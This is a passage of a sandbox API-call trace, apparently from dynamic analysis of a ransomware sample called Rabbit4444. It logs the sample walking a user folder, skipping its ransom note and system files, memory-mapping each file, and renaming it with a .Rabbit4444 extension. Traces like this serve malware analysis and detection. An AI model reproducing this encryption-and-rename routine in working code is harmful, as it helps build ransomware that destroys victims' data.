0x109140 [0067.394] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e320 | out: hHeap=0xe0000) returned 1 [0067.394] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0067.394] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11db48 [0067.394] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0067.394] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11db48 | out: hHeap=0xe0000) returned 1 [0067.394] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0067.394] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15870480545) returned 1 [0067.394] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1179c8 | out: hHeap=0xe0000) returned 1 [0067.394] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c00 | out: hHeap=0xe0000) returned 1 [0067.394] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.394] CloseHandle (hObject=0x29c) returned 1 [0067.394] CloseHandle (hObject=0x280) returned 1 [0067.394] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\apps.schema.Rabbit4444") returned 173 [0067.394] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\apps.schema" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\apps.schema"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\apps.schema.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\apps.schema.rabbit4444"), dwFlags=0x1) returned 1 [0067.395] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a54f700, ftCreationTime.dwHighDateTime=0x1d19562, ftLastAccessTime.dwLowDateTime=0x24f7384, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x2a54f700, ftLastWriteTime.dwHighDateTime=0x1d19562, nFileSizeHigh=0x0, nFileSizeLow=0x7b5e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="appsconversions.txt", cAlternateFileName="APPSCO~1.TXT")) returned 1 [0067.395] lstrcmpiW (lpString1="appsconversions.txt", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.395] lstrcmpiW (lpString1="appsconversions.txt", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.395] lstrcmpiW (lpString1="appsconversions.txt", lpString2="Rabbit4444.exe") returned -1 [0067.395] lstrcmpiW (lpString1="appsconversions.txt", lpString2=".") returned 1 [0067.395] lstrcmpiW (lpString1="appsconversions.txt", lpString2="..") returned 1 [0067.395] lstrcmpiW (lpString1="appsconversions.txt", lpString2="windows") returned -1 [0067.395] lstrcmpiW (lpString1="appsconversions.txt", lpString2="bootmgr") returned -1 [0067.395] lstrcmpiW (lpString1="appsconversions.txt", lpString2="pagefile.sys") returned -1 [0067.395] lstrcmpiW (lpString1="appsconversions.txt", lpString2="boot") returned -1 [0067.395] lstrcmpiW (lpString1="appsconversions.txt", lpString2="ids.txt") returned -1 [0067.395] lstrcmpiW (lpString1="appsconversions.txt", lpString2="NTUSER.DAT") returned -1 [0067.395] lstrcpyW (in: lpString1=0x130ec66, lpString2="appsconversions.txt" | out: lpString1="appsconversions.txt") returned="appsconversions.txt" [0067.396] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\appsconversions.txt", dwFileAttributes=0x0) returned 1 [0067.396] lstrlenW (lpString="appsconversions.txt") returned 19 [0067.396] lstrlenW (lpString="Rabbit4444") returned 10 [0067.396] lstrcmpiW (lpString1="rsions.txt", lpString2="Rabbit4444") returned 1 [0067.396] lstrlenW (lpString=".dll") returned 4 [0067.396] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0067.396] lstrlenW (lpString=".lnk") returned 4 [0067.396] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0067.396] lstrlenW (lpString=".ini") returned 4 [0067.396] lstrcmpiW (lpString1=".txt", lpString2=".ini") returned 1 [0067.396] lstrlenW (lpString=".sys") returned 4 [0067.397] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0067.397] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\appsconversions.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\appsconversions.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0067.397] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.397] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15870769620) returned 1 [0067.397] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=31582) returned 1 [0067.397] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117770 [0067.397] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101848 [0067.397] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7e60, lpName=0x0) returned 0x29c [0067.398] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7e60) returned 0x70000 [0067.401] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x11e320 [0067.401] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0067.401] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e320 | out: hHeap=0xe0000) returned 1 [0067.401] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0067.401] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11db48 [0067.401] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0067.401] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11db48 | out: hHeap=0xe0000) returned 1 [0067.401] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0067.401] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15871220044) returned 1 [0067.402] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117770 | out: hHeap=0xe0000) returned 1 [0067.402] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101848 | out: hHeap=0xe0000) returned 1 [0067.402] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.402] CloseHandle (hObject=0x29c) returned 1 [0067.402] CloseHandle (hObject=0x280) returned 1 [0067.402] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\appsconversions.txt.Rabbit4444") returned 181 [0067.402] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\appsconversions.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\appsconversions.txt"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\appsconversions.txt.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\appsconversions.txt.rabbit4444"), dwFlags=0x1) returned 1 [0067.406] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1211e300, ftCreationTime.dwHighDateTime=0x1d196ee, ftLastAccessTime.dwLowDateTime=0x24d1109, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x1211e300, ftLastWriteTime.dwHighDateTime=0x1d196ee, nFileSizeHigh=0x0, nFileSizeLow=0x5758c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="appsglobals.txt", cAlternateFileName="APPSGL~1.TXT")) returned 1 [0067.406] lstrcmpiW (lpString1="appsglobals.txt", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.406] lstrcmpiW (lpString1="appsglobals.txt", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.406] lstrcmpiW (lpString1="appsglobals.txt", lpString2="Rabbit4444.exe") returned -1 [0067.406] lstrcmpiW (lpString1="appsglobals.txt", lpString2=".") returned 1 [0067.406] lstrcmpiW (lpString1="appsglobals.txt", lpString2="..") returned 1 [0067.406] lstrcmpiW (lpString1="appsglobals.txt", lpString2="windows") returned -1 [0067.406] lstrcmpiW (lpString1="appsglobals.txt", lpString2="bootmgr") returned -1 [0067.406] lstrcmpiW (lpString1="appsglobals.txt", lpString2="pagefile.sys") returned -1 [0067.406] lstrcmpiW (lpString1="appsglobals.txt", lpString2="boot") returned -1 [0067.406] lstrcmpiW (lpString1="appsglobals.txt", lpString2="ids.txt") returned -1 [0067.406] lstrcmpiW (lpString1="appsglobals.txt", lpString2="NTUSER.DAT") returned -1 [0067.406] lstrcpyW (in: lpString1=0x130ec66, lpString2="appsglobals.txt" | out: lpString1="appsglobals.txt") returned="appsglobals.txt" [0067.406] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\appsglobals.txt", dwFileAttributes=0x0) returned 1 [0067.407] lstrlenW (lpString="appsglobals.txt") returned 15 [0067.407] lstrlenW (lpString="Rabbit4444") returned 10 [0067.407] lstrcmpiW (lpString1="lobals.txt", lpString2="Rabbit4444") returned -1 [0067.407] lstrlenW (lpString=".dll") returned 4 [0067.407] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0067.407] lstrlenW (lpString=".lnk") returned 4 [0067.407] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0067.407] lstrlenW (lpString=".ini") returned 4 [0067.407] lstrcmpiW (lpString1=".txt", lpString2=".ini") returned 1 [0067.407] lstrlenW (lpString=".sys") returned 4 [0067.407] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0067.407] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\appsglobals.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\appsglobals.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0067.407] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.407] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15871833914) returned 1 [0067.408] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=357772) returned 1 [0067.408] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0067.408] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101518 [0067.408] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x57890, lpName=0x0) returned 0x29c [0067.410] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x57890) returned 0x2b0000 [0067.421] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x11e320 [0067.421] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0067.421] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e320 | out: hHeap=0xe0000) returned 1 [0067.421] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0067.421] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11db48 [0067.422] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0067.422] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11db48 | out: hHeap=0xe0000) returned 1 [0067.422] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0067.422] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15873251085) returned 1 [0067.422] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0067.422] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101518 | out: hHeap=0xe0000) returned 1 [0067.422] UnmapViewOfFile (lpBaseAddress=0x2b0000) returned 1 [0067.425] CloseHandle (hObject=0x29c) returned 1 [0067.425] CloseHandle (hObject=0x280) returned 1 [0067.425] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\appsglobals.txt.Rabbit4444") returned 177 [0067.425] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\appsglobals.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\appsglobals.txt"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\appsglobals.txt.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\appsglobals.txt.rabbit4444"), dwFlags=0x1) returned 1 [0067.426] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f2ed200, ftCreationTime.dwHighDateTime=0x1d196ee, ftLastAccessTime.dwLowDateTime=0x24f7384, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x1f2ed200, ftLastWriteTime.dwHighDateTime=0x1d196ee, nFileSizeHigh=0x0, nFileSizeLow=0x13d5b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="appssynonyms.txt", cAlternateFileName="APPSSY~1.TXT")) returned 1 [0067.426] lstrcmpiW (lpString1="appssynonyms.txt", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.426] lstrcmpiW (lpString1="appssynonyms.txt", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.426] lstrcmpiW (lpString1="appssynonyms.txt", lpString2="Rabbit4444.exe") returned -1 [0067.426] lstrcmpiW (lpString1="appssynonyms.txt", lpString2=".") returned 1 [0067.426] lstrcmpiW (lpString1="appssynonyms.txt", lpString2="..") returned 1 [0067.426] lstrcmpiW (lpString1="appssynonyms.txt", lpString2="windows") returned -1 [0067.426] lstrcmpiW (lpString1="appssynonyms.txt", lpString2="bootmgr") returned -1 [0067.426] lstrcmpiW (lpString1="appssynonyms.txt", lpString2="pagefile.sys") returned -1 [0067.426] lstrcmpiW (lpString1="appssynonyms.txt", lpString2="boot") returned -1 [0067.426] lstrcmpiW (lpString1="appssynonyms.txt", lpString2="ids.txt") returned -1 [0067.426] lstrcmpiW (lpString1="appssynonyms.txt", lpString2="NTUSER.DAT") returned -1 [0067.426] lstrcpyW (in: lpString1=0x130ec66, lpString2="appssynonyms.txt" | out: lpString1="appssynonyms.txt") returned="appssynonyms.txt" [0067.426] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\appssynonyms.txt", dwFileAttributes=0x0) returned 1 [0067.427] lstrlenW (lpString="appssynonyms.txt") returned 16 [0067.427] lstrlenW (lpString="Rabbit4444") returned 10 [0067.427] lstrcmpiW (lpString1="nonyms.txt", lpString2="Rabbit4444") returned -1 [0067.427] lstrlenW (lpString=".dll") returned 4 [0067.427] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0067.427] lstrlenW (lpString=".lnk") returned 4 [0067.427] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0067.427] lstrlenW (lpString=".ini") returned 4 [0067.427] lstrcmpiW (lpString1=".txt", lpString2=".ini") returned 1 [0067.427] lstrlenW (lpString=".sys") returned 4 [0067.427] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0067.427] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\appssynonyms.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\appssynonyms.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0067.427] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.427] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15873826936) returned 1 [0067.428] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=81243) returned 1 [0067.428] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117d10 [0067.428] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101c88 [0067.428] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x14060, lpName=0x0) returned 0x29c [0067.429] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x14060) returned 0x70000 [0067.433] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x11e320 [0067.433] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0067.433] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e320 | out: hHeap=0xe0000) returned 1 [0067.433] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0067.433] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11db48 [0067.433] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0067.433] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11db48 | out: hHeap=0xe0000) returned 1 [0067.433] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0067.433] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15874421323) returned 1 [0067.434] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117d10 | out: hHeap=0xe0000) returned 1 [0067.434] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c88 | out: hHeap=0xe0000) returned 1 [0067.434] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.434] CloseHandle (hObject=0x29c) returned 1 [0067.434] CloseHandle (hObject=0x280) returned 1 [0067.435] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\appssynonyms.txt.Rabbit4444") returned 178 [0067.435] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\appssynonyms.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\appssynonyms.txt"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\appssynonyms.txt.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\appssynonyms.txt.rabbit4444"), dwFlags=0x1) returned 1 [0067.435] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd9bdd500, ftCreationTime.dwHighDateTime=0x1d196ec, ftLastAccessTime.dwLowDateTime=0x24f7384, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xd9bdd500, ftLastWriteTime.dwHighDateTime=0x1d196ec, nFileSizeHigh=0x0, nFileSizeLow=0x122, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.csg", cAlternateFileName="")) returned 1 [0067.435] lstrcmpiW (lpString1="settings.csg", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0067.435] lstrcmpiW (lpString1="settings.csg", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.435] lstrcmpiW (lpString1="settings.csg", lpString2="Rabbit4444.exe") returned 1 [0067.435] lstrcmpiW (lpString1="settings.csg", lpString2=".") returned 1 [0067.435] lstrcmpiW (lpString1="settings.csg", lpString2="..") returned 1 [0067.435] lstrcmpiW (lpString1="settings.csg", lpString2="windows") returned -1 [0067.435] lstrcmpiW (lpString1="settings.csg", lpString2="bootmgr") returned 1 [0067.435] lstrcmpiW (lpString1="settings.csg", lpString2="pagefile.sys") returned 1 [0067.435] lstrcmpiW (lpString1="settings.csg", lpString2="boot") returned 1 [0067.436] lstrcmpiW (lpString1="settings.csg", lpString2="ids.txt") returned 1 [0067.436] lstrcmpiW (lpString1="settings.csg", lpString2="NTUSER.DAT") returned 1 [0067.436] lstrcpyW (in: lpString1=0x130ec66, lpString2="settings.csg" | out: lpString1="settings.csg") returned="settings.csg" [0067.436] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\settings.csg", dwFileAttributes=0x0) returned 1 [0067.436] lstrlenW (lpString="settings.csg") returned 12 [0067.436] lstrlenW (lpString="Rabbit4444") returned 10 [0067.436] lstrcmpiW (lpString1="ttings.csg", lpString2="Rabbit4444") returned 1 [0067.436] lstrlenW (lpString=".dll") returned 4 [0067.436] lstrcmpiW (lpString1=".csg", lpString2=".dll") returned -1 [0067.436] lstrlenW (lpString=".lnk") returned 4 [0067.436] lstrcmpiW (lpString1=".csg", lpString2=".lnk") returned -1 [0067.436] lstrlenW (lpString=".ini") returned 4 [0067.436] lstrcmpiW (lpString1=".csg", lpString2=".ini") returned -1 [0067.436] lstrlenW (lpString=".sys") returned 4 [0067.436] lstrcmpiW (lpString1=".csg", lpString2=".sys") returned -1 [0067.436] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\settings.csg" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\input_{ecd52277-de32-43d5-8c62-58de1116f72e}\\settings.csg"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0067.437] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.437] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15874746649) returned 1 [0067.437] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=290) returned 1 [0067.437] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1178d8 [0067.437] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d10 [0067.437] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x430, lpName=0x0) returned 0x29c [0067.438] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x430) returned 0x70000 [0067.440] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x11e320 [0067.440] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0067.440] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e320 | out: hHeap=0xe0000) returned 1 [0067.440] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0067.440] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, 